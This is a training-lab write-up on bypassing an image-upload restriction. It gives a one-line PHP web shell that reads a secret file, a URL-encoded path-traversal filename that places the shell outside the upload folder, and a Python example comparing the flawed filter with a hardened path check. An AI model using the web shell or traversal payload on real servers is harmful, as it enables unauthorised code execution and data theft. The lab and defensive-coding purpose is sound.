8.3 Lab: Web shell upload via path traversal | 2024
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability | Karthikeyan Nagaraj
Description
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Create a file called shell.php which contains the following code:
  <?php echo file_get_contents('/home/carlos/secret'); ?>
- Log in to your account with wiener:peter.
- Upload shell.php, capture the request, and change the value of the filename from shell.php to %2e%2e%2f/shell.php, then send the request.
- Now go to My Account, right-click on the avatar, click Open in a new tab, change the location to /files/avatars/../shell.php, and send the request.
- If it does not work, send the request to Burp Suite and you will see the secret.
- Copy the secret and paste it into the solution to solve the lab.
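The bypass works because the server strips a literal "../" from the filename before a later component URL-decodes it. The following is an added example, not code from the lab or this write-up, that models that filter ordering beside a hardened version of the same upload-path check; the upload root /var/www/avatars is an assumed path.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed upload root for this example (not the lab's real path).
UPLOAD_DIR = "/var/www/avatars"
# Only plain image names are acceptable avatars: no slashes, no PHP.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)$")


def naive_target(filename: str) -> str:
    """Models the lab's weak filter: strip a literal '../' from the
    multipart filename, then a later component URL-decodes the value.
    Filtering before decoding is the ordering bug the lab relies on."""
    stripped = filename.replace("../", "")
    decoded = unquote(stripped)  # '%2e%2e%2f' only becomes '../' here
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, decoded))


def hardened_target(filename: str):
    """Return the storage path for an upload, or None if it is rejected.
    Decode first, refuse anything that is still encoded, drop every
    directory component, whitelist the name, and confirm the final
    path is a direct child of UPLOAD_DIR."""
    decoded = unquote(filename)
    if unquote(decoded) != decoded:      # double-encoded: reject
        return None
    if any(c in decoded for c in "/\\\x00"):
        return None                      # no separators or NUL bytes
    base = posixpath.basename(decoded)
    if not SAFE_NAME.fullmatch(base):
        return None                      # wrong extension or odd chars
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, base))
    if posixpath.dirname(target) != UPLOAD_DIR:
        return None                      # defence in depth
    return target


def escapes_upload_dir(path: str) -> bool:
    """True when a resolved path landed outside UPLOAD_DIR."""
    return posixpath.commonpath([UPLOAD_DIR, path]) != UPLOAD_DIR


if __name__ == "__main__":
    # Constructed sample filenames: the lab's payload and an honest upload.
    for name in ["../shell.php", "%2e%2e%2f/shell.php", "avatar.png"]:
        print(name, "->", naive_target(name), "|", hardened_target(name))
```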
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng